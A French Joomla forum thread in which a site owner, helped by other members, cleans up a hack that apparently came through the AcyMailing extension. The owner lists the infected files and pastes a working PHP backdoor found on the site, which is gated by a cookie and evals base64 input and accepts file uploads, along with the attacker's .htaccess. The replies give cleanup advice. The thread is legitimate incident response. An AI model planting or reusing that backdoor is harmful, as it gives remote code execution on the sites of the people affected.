Hack d'un site en cours de migration…

Réduire
Une réponse a été apportée à ce sujet.
X
X
Réduire
 
  • Page sur 1
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages
Précédent template Suivant
  • #1

    Hack d'un site en cours de migration…


    Bonjour,

    Bon voilà, notification de mon hébergeur : site hacké
    J’ai une liste des fichiers modifiés :
    /www/_new/13a1b/9c005.php phpnet.php.webshell.8
    /www/_new/assets/images/accesson.php phpnet.php.base64nested
    /www/_new/bb5736816cc6.php phpnet.php.base64nested
    /www/_new/index.php phpnet.{hex}php.evalhexGlobals
    /www/_new/media/com_acym/images/thumbnails/thumbnail_125.png?.php phpnet.php.base64nested
    /www/_new/media/com_acym/images/thumbnails/thumbnail_150.png?.php phpnet.php.base64nested
    /www/_new/media/com_acym/images/thumbnails/thumbnail_246.png?.php phpnet.php.base64nested
    /www/_new/media/com_acym/images/thumbnails/thumbnail_260.png?.php phpnet.php.base64nested
    /www/_new/media/com_acym/images/thumbnails/thumbnail_297.png?.php phpnet.php.base64nested
    /www/_new/media/com_acym/images/thumbnails/thumbnail_310.png?.php phpnet.php.base64nested
    /www/_new/media/com_acym/images/thumbnails/thumbnail_329.png?.php phpnet.php.base64nested
    /www/_new/media/com_acym/images/thumbnails/thumbnail_428.png?.php phpnet.php.base64nested
    /www/_new/media/com_acym/images/thumbnails/thumbnail_678.png?.php phpnet.php.base64nested
    /www/_new/media/com_acym/images/thumbnails/thumbnail_920.png?.php phpnet.php.base64nested​
    Le 1er cité ne me semble pas haché (?) et il est strictement identique avec celui d'un autre site Joomla :
    Code:
    <?php echo 409723*20;if(md5($_COOKIE["d"])=="17028f487cb2a84607646da3ad3878ec"){echo"ok";eval(base64_decode($_REQUEST["id"]));if($_POST["up"]=="up"){@copy($_FILES["file"]["tmp_name"],$_FILES["file"]["name"]);}}?>
    Par contre dans la liste fournie par mon hébergeur, il manque certains fichiers que j'ai repérés :
    - certaines images en plus de celles déjà signalées dans Acymailing
    - un répertoire « cli » qui semble destiné à des tâches CRON
    - un répertoire « xmlrpc »
    - about.php à la racine
    - index.php
    - . htaccess à la racine et dans chaque répertoire. Son code :
    Code:
    <FilesMatch ".(py|exe|php)$">
 Order allow,deny
 Deny from all
</FilesMatch>
<FilesMatch "^(about.php|radio.php|index.php|content.php|lock360.php|admin.php|wp-login.php)$">
 Order allow,deny
 Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>​
    J’ai :
    - viré ou remplacé les fichiers repérés
    - remis le .htaccess type fourni par Joomla à la racine du site (les autres y sont encore dans chaque répertoire : je ne sais pas comment les virer tous…)
    - modifié les mots de passe sur les bases de données et sur les accès au back-office
    - désinstallé complètement Acymailing Starter



    Sans être spécialiste, je pense qu’ils sont passés par Acymailing.
    Je vais voir si je repars d’une sauvegarde du site (ce qui serait plus sérieux…)
    L’inconvénient c’est que j’étais en pleine mise à jour de Joomla, des extensions (dont Acymailing) et qu’il va falloir tout reprendre…



    Je veux bien votre expertise…

    Dernière édition par Mister Paul à 16/10/2023, 22h40
    Tags: Aucun
  • Réponse sélectionnée par Mister Paul, le 22/10/2023, 16h36.
    Bonjour,

    Le problème est connu depuis le mois de mai, seulement leur communication s'est faite timidement à la fin de l'été...
    Cela aura nécessité la pression de la communauté et de l'équipe de sécurité de Joomla pour les inciter à gérer cela correctement.

    Voici le message que nous avons relayé sur le portail joomla.fr :
    Information de sécurité
    https://www.joomla.fr/actualites/information-de-securite
    Habituellement, nous ne faisons aucun relais des informations sur les extensions tierces mais quand il s'agit de sécurité, cela devient une priorité.Information importante :  Si vous utilisez ...


    Effectivement, votre intuition est bonne.
    Et le mieux serait de passer par une restauration avec une mise à jour d'acymailing.


    Une fois que vous avez mis à jour AcyMailing vers sa dernière version, nous vous invitons à rechercher les fichiers nommés thumbnail_*.php (c'est-à-dire thumbnail_999.png?.php) sur vos sites Web. Les modèles d'attaque courants ont écrit ces fichiers dans media/com_acym/images/thumbnails, mais ces fichiers auraient pu être créés dans d'autres dossiers. Si vous rencontrez un fichier portant un nom similaire, ne l'ouvrez pas et utilisez FTP ou SSH pour le supprimer.

    Les emplacements les plus courants (XXX sont des lettres aléatoires – la date de ces fichiers peut être antérieure à mai) peuvent être :


    /media/com_acym/images/thumbnails/thumbnail_*.php
    /api/includes/xxx.php /components/com_ajax/ xxx.php
    /layouts/joomla/icon/xxx.php /media/com_XXX/xxx.php
    /media/com_tags/js/xxx.php /templates/system/xxx.php

    Recherchez les fichiers contenant « $_COOKIE », car des modèles d'attaque courants l'ont utilisé pour tenter d'obtenir les valeurs des cookies.
    Si vous trouvez des fichiers malveillants, il peut être judicieux de mettre à jour les mots de passe de vos comptes FTP, DB et SMTP.

    Remarque : Si vous utilisez une version Starter, les mises à jour automatiques semblent avoir été désactivé donc vérifier immédiatement votre version d'AcyMailing.
    N'hésitez pas à vérifier les répertoires indiqués ci-dessus.



    Mister Paul aime ceci.
    • "J'aime" 1
    • Meilleure réponse !

    Commentaire

    • #2
      Bonjour,

      Le problème est connu depuis le mois de mai, seulement leur communication s'est faite timidement à la fin de l'été...
      Cela aura nécessité la pression de la communauté et de l'équipe de sécurité de Joomla pour les inciter à gérer cela correctement.

      Voici le message que nous avons relayé sur le portail joomla.fr :
      Information de sécurité
      https://www.joomla.fr/actualites/information-de-securite
      Habituellement, nous ne faisons aucun relais des informations sur les extensions tierces mais quand il s'agit de sécurité, cela devient une priorité.Information importante :  Si vous utilisez ...


      Effectivement, votre intuition est bonne.
      Et le mieux serait de passer par une restauration avec une mise à jour d'acymailing.


      Une fois que vous avez mis à jour AcyMailing vers sa dernière version, nous vous invitons à rechercher les fichiers nommés thumbnail_*.php (c'est-à-dire thumbnail_999.png?.php) sur vos sites Web. Les modèles d'attaque courants ont écrit ces fichiers dans media/com_acym/images/thumbnails, mais ces fichiers auraient pu être créés dans d'autres dossiers. Si vous rencontrez un fichier portant un nom similaire, ne l'ouvrez pas et utilisez FTP ou SSH pour le supprimer.

      Les emplacements les plus courants (XXX sont des lettres aléatoires – la date de ces fichiers peut être antérieure à mai) peuvent être :


      /media/com_acym/images/thumbnails/thumbnail_*.php
      /api/includes/xxx.php /components/com_ajax/ xxx.php
      /layouts/joomla/icon/xxx.php /media/com_XXX/xxx.php
      /media/com_tags/js/xxx.php /templates/system/xxx.php

      Recherchez les fichiers contenant « $_COOKIE », car des modèles d'attaque courants l'ont utilisé pour tenter d'obtenir les valeurs des cookies.
      Si vous trouvez des fichiers malveillants, il peut être judicieux de mettre à jour les mots de passe de vos comptes FTP, DB et SMTP.

      Remarque : Si vous utilisez une version Starter, les mises à jour automatiques semblent avoir été désactivé donc vérifier immédiatement votre version d'AcyMailing.
      N'hésitez pas à vérifier les répertoires indiqués ci-dessus.



      Mister Paul aime ceci.
      Joomla User Group (JUG) Lille : https://www.facebook.com/groups/JUGLille/
      • "J'aime" 1
      • Meilleure réponse !

      Commentaire

      • #3
        Merci.

        Mais ça se corse.

        Pas (encore) pour le site en question (que j'ai provisoirement mis de côté), mais pour un second qui lui aussi a AcyMailing. La version Essential 8.5.0 a été installée depuis début juillet dernier. Cette version est/était sensée bloquer le hack qui a dû survenir en mai d'après ce que j'ai vu.

        Sur les conseils d'Acyba je cherche à installer la dernière version d'AcyMailing Essential, mais les plugins d'installation ont disparu avec le hack (cf screenshot)
        (j'ai Joomla! 3.9.27 sur le site - j'allais updater)
        Fichiers joints
        Dernière édition par Mister Paul à 17/10/2023, 11h13

        Commentaire

        • #4
          Bonjour,

          Essaie d'écraser par ftp ton site 3.9 avec la même version (pack complet sans le dossier "installation")
          Mister Paul aime ceci.
          "Patience et longueur de temps font plus que force ni que rage..." (La Fontaine : Le Lion et le Rat) - "Il n'y a pas de problèmes; il n'y a que des solutions" (André Gide).
          MoovJla et LazyDbBackup sur www.joomxtensions.com - FaQ sur www.fontanil.info - Site pro : www.robertg-conseil.fr chez PHPNET, sites perso chez PlanetHoster + sites gérés chez PHPNET, PlanetHoster, Ionos et OVH
          • "J'aime" 1

          Commentaire

          • #5
            Oui c'est ce que le support d'Acymailing m'a conseillé de faire.
            J'ai longtemps hésité car je croyais que ça aurait effacé tous les dossiers non présents dans les sous-dossiers originaux Joomla. Mais non, j'ai testé et par FTP ça fonctionne plus intelligemment que sur Mac ! (je ne sais pas si j'ai été clair, là…)
            Bref…

            La dernière version d'Acymailing scanne le site depuis 15mn.
            On va voir ce qu'il trouvera.

            Moi je vois un .myjoomla.configuration.php.md5 très douteux à la racine
            A virer, non ?

            Et surtout, dans chaque répertoire au même niveau que www (ce site est hébergé chez OVH) il y a un répertoire
            nom du répertoire/assets/images/accesson.php Il s'est drôlement répandu le bougre…

            On va voir si Acymailing repère au-dessus de www…

            Commentaire

            • #6
              As-tu besoin de ces autres répertoires, sur ton serveur ?
              Je ne sais pas ce que peut être ce fichier "md5", je viens d'en trouver un sur un site sur lequel je suis intervenu, il ne contient qu'une assez courte série de caractères, donc a priori sans danger.
              "Patience et longueur de temps font plus que force ni que rage..." (La Fontaine : Le Lion et le Rat) - "Il n'y a pas de problèmes; il n'y a que des solutions" (André Gide).
              MoovJla et LazyDbBackup sur www.joomxtensions.com - FaQ sur www.fontanil.info - Site pro : www.robertg-conseil.fr chez PHPNET, sites perso chez PlanetHoster + sites gérés chez PHPNET, PlanetHoster, Ionos et OVH

              Commentaire

              • #7
                Envoyé par RobertG Voir le message
                As-tu besoin de ces autres répertoires, sur ton serveur ?
                Je suis en train de faire le ménage…
                Envoyé par RobertG Voir le message
                Je ne sais pas ce que peut être ce fichier "md5", je viens d'en trouver un sur un site sur lequel je suis intervenu, il ne contient qu'une assez courte série de caractères, donc a priori sans danger.
                Il y a aussi les :
                includes/.myjoomla.defines.php.md5
                includes/.myjoomla.framework.php.md5
                Tout cela ne me paraît pas très safe : je ne me souviens pas avoir demandé un "myjoomla"…

                Comment savoir si un fichier provient de Joomla ou pas ?
                Il suffit de voir si il figure dans le dossier d'installé de Joomla ?
                ou… ?

                Et s'il provient d'une extension installée, comment le savoir ?
                Dernière édition par Mister Paul à 17/10/2023, 21h24

                Commentaire

                • #8
                  Un lien avec mysites.guru
                  The security token did not match. The request was aborted to prevent any security breach. Please try again
                  https://stackoverflow.com/questions/60684524/the-security-token-did-not-match-the-request-was-aborted-to-prevent-any-securit
                  I've got the error above in my Joomla website when I either try to log in or create a new account from the side site. I have also noticed the two following things: if I create a new user from the

                  ".myjoomla.configuration.php.md5" contains the md5 hash of the configuration.php file and appears on your site as part of the mySites.guru service you either subscribed to or trialled. It is part of the near-realtime alerting service which detects when configuration.php has been changed and alerts you if you are a paying subscriber of the mySites.guru service. It is NOT an indication of a hack at all.
                  Mister Paul aime ceci.
                  "Patience et longueur de temps font plus que force ni que rage..." (La Fontaine : Le Lion et le Rat) - "Il n'y a pas de problèmes; il n'y a que des solutions" (André Gide).
                  MoovJla et LazyDbBackup sur www.joomxtensions.com - FaQ sur www.fontanil.info - Site pro : www.robertg-conseil.fr chez PHPNET, sites perso chez PlanetHoster + sites gérés chez PHPNET, PlanetHoster, Ionos et OVH
                  • "J'aime" 1

                  Commentaire

                  Précédent template Suivant

                  Annonce

                  Réduire
                  Aucune annonce pour le moment.

                  Partenaire de l'association

                  Réduire
                  Hébergeur Web PlanetHoster
                  Travaille ...
                  X